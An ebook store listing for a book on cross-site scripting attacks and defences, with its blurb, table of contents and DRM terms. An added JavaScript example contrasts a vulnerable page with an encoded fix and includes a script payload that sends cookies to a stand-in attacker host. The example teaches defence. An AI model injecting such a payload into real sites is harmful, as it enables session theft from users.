XSS Attacks -  Seth Fogie,  Jeremiah Grossman,  Robert Hansen,  Petko D. Petkov,  Anton Rager

XSS Attacks (eBook)

Cross Site Scripting Exploits and Defense
eBook Download: PDF
2011 | 1st edition
480 pages
Elsevier Science (publisher)
978-0-08-055340-5 (ISBN)
48.95 incl. VAT
Cross Site Scripting Attacks starts by defining the terms and laying out the ground work. It assumes that the reader is familiar with basic web programming (HTML) and JavaScript. First it discusses the concepts, methodology, and technology that makes XSS a valid concern. It then moves into the various types of XSS attacks, how they are implemented, used, and abused. After XSS is thoroughly explored, the next part provides examples of XSS malware and demonstrates real cases where XSS is a dangerous risk that exposes internet users to remote access, sensitive data theft, and monetary losses. Finally, the book closes by examining the ways developers can avoid XSS vulnerabilities in their web applications, and how users can avoid becoming a victim. The audience is web developers, security practitioners, and managers.

*XSS Vulnerabilities exist in 8 out of 10 Web sites
*The authors of this book are the undisputed industry leading authorities
*Contains independent, bleeding edge research, code listings and exploits that cannot be found anywhere else
A cross-site scripting attack is a specific type of attack on a web application: script injected through the application runs in the browsers of that site's users, which lets attackers mimic the real site and fool people into providing personal data.
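An added illustration of the pattern described above, not code from the book: a page that reflects a query parameter into its HTML unencoded, beside the output-encoded version (the fix the book treats under Output Encoding in Chapter 9). The route, the parameter name, the page template and the attacker hostname are assumptions made for this example.

```javascript
// Added example, not from the book. The /search route, the "q" parameter and
// the attacker.invalid hostname are assumptions made for illustration.

// Encode the five characters that let untrusted text break out of an HTML
// text node or a double-quoted attribute value.
function htmlEncode(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

function queryParam(url, name) {
  // Base URL is only needed so relative paths parse; it is not contacted.
  return new URL(url, 'https://example.invalid').searchParams.get(name) ?? '';
}

// Vulnerable: "q" is copied into the page unchanged, so a crafted link such as
// /search?q=<script>...</script> runs in the browser of whoever clicks it,
// under the site's own origin (reflected XSS).
function renderSearchVulnerable(url) {
  return `<h1>Results for: ${queryParam(url, 'q')}</h1>`;
}

// Fixed: encode at the HTML output sink, so the same input renders as text.
function renderSearchSafe(url) {
  return `<h1>Results for: ${htmlEncode(queryParam(url, 'q'))}</h1>`;
}

// Crude check used below: after removing the tags the template itself emits,
// is any tag left over? Only attacker-supplied markup can put one there.
function containsInjectedTag(html, templateTags = ['<h1>', '</h1>']) {
  let rest = html;
  for (const t of templateTags) rest = rest.replace(t, '');
  return /<[a-zA-Z!\/]/.test(rest);
}

// Constructed payload of the kind a phishing link would carry: exfiltrate the
// victim's cookies to a host the attacker controls.
const PAYLOAD =
  '<script>document.location="https://attacker.invalid/?c="+document.cookie</script>';
const ATTACK_URL = '/search?q=' + encodeURIComponent(PAYLOAD);

console.log('vulnerable:', renderSearchVulnerable(ATTACK_URL));
console.log('safe:      ', renderSearchSafe(ATTACK_URL));
console.log('injected?  ',
  containsInjectedTag(renderSearchVulnerable(ATTACK_URL)),
  containsInjectedTag(renderSearchSafe(ATTACK_URL)));
```

Encoding has to match the sink: `htmlEncode` is correct for an HTML text node or quoted attribute, but the same value placed inside a `<script>` block, a URL, or a CSS context needs the encoding for that context instead, which is why the book separates input filtering from output encoding.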

Front Cover 1
XSS Attacks: Cross Site Scripting Exploits and Defense 4
Copyright Page 5
Contents 10
Chapter 1. Cross-site Scripting Fundamentals 16
    Introduction 17
    Web Application Security 19
    XML and AJAX Introduction 21
    Summary 26
    Solutions Fast Track 26
    Frequently Asked Questions 27
Chapter 2. The XSS Discovery Toolkit 30
    Introduction 31
    Burp 31
    Debugging DHTML With Firefox Extensions 36
    Analyzing HTTP Traffic with Firefox Extensions 50
    GreaseMonkey 61
    Hacking with Bookmarklets 72
    Using Technika 75
    Summary 78
    Solutions Fast Track 79
    Frequently Asked Questions 80
Chapter 3. XSS Theory 82
    Introduction 83
    Getting XSS'ed 83
    DOM-based XSS In Detail 90
    Redirection 101
    CSRF 108
    Flash, QuickTime, PDF Oh My 112
    HTTP Response Injection 138
    Source vs. DHTML Reality 140
    Bypassing XSS Length Limitations 146
    XSS Filter Evasion 148
    Summary 174
    Solutions Fast Track 174
    Frequently Asked Questions 177
Chapter 4. XSS Attack Methods 178
    Introduction 179
    History Stealing 179
    Intranet Hacking 188
    XSS Defacements 199
    Summary 203
    Solutions Fast Track 203
    Frequently Asked Questions 204
    References 205
Chapter 5. Advanced XSS Attack Vectors 206
    Introduction 207
    DNS Pinning 207
    IMAP3 214
    MHTML 219
    Hacking JSON 224
    Summary 231
    Frequently Asked Questions 232
Chapter 6. XSS Exploited 234
    Introduction 235
    XSS vs. Firefox Password Manager 235
    SeXXS Offenders 238
    Equifraked 243
    Owning the Cingular Xpress Mail User 247
    Alternate XSS: Outside the BoXXS 263
    XSS Old School - Windows Mobile PIE 4.2 277
    XSSing Firefox Extensions 282
    XSS Exploitation: Point-Click-Own with EZPhotoSales 300
    Summary 303
    Solutions Fast Track 303
    Frequently Asked Questions 306
Chapter 7. Exploit Frameworks 308
    Introduction 309
    AttackAPI 309
    BeEF 337
    CAL9000 345
    Overview of XSS-Proxy 353
    Summary 386
    Solutions Fast Track 386
    Frequently Asked Questions 387
Chapter 8. XSS Worms 390
    Introduction 391
    Exponential XSS 391
    XSS Warhol Worm 394
    Linear XSS Worm 395
    Samy Is My Hero 401
    Summary 406
    Solutions Fast Track 406
    Frequently Asked Questions 408
Chapter 9. Preventing XSS Attacks 410
    Introduction 411
    Filtering 411
    Input Encoding 415
    Output Encoding 417
    Web Browser's Security 417
    Summary 421
    Solutions Fast Track 421
    Frequently Asked Questions 422
Appendix A. The Owned List 424
Index 454

Publication date (per publisher) 18.4.2011
Language English
Subject areas Computer Science > Networks > Security / Firewall
Computer Science > Theory / Study > Cryptology
Computer Science > Web / Internet > Web Design / Usability
ISBN-10 0-08-055340-0 / 0080553400
ISBN-13 978-0-08-055340-5 / 9780080553405
PDF (Adobe DRM)
Size: 65.7 MB

Copy protection: Adobe DRM
Adobe DRM is a copy-protection scheme intended to protect the eBook against misuse. The eBook is bound to your personal Adobe ID at download time, and you can then read it only on devices that are also registered to that Adobe ID.

File format: PDF (Portable Document Format)
With its fixed page layout, PDF is well suited to technical books with columns, tables and figures. A PDF can be displayed on almost any device, but is only of limited use on small displays (smartphone, eReader).

System requirements:
PC/Mac: You can read this eBook on a PC or Mac. You need an Adobe ID and the free Adobe Digital Editions software. We advise against using the OverDrive Media Console; in our experience it frequently has problems with Adobe DRM.
eReader: This eBook can be read on (almost) all eBook readers. It is not compatible with the Amazon Kindle, however.
Smartphone/Tablet: Whether Apple or Android, you can read this eBook. You need an Adobe ID and a free app.

Buying eBooks from abroad
For tax-law reasons we can only sell eBooks within Germany and Switzerland. Regrettably, we cannot fulfil eBook orders from other countries.
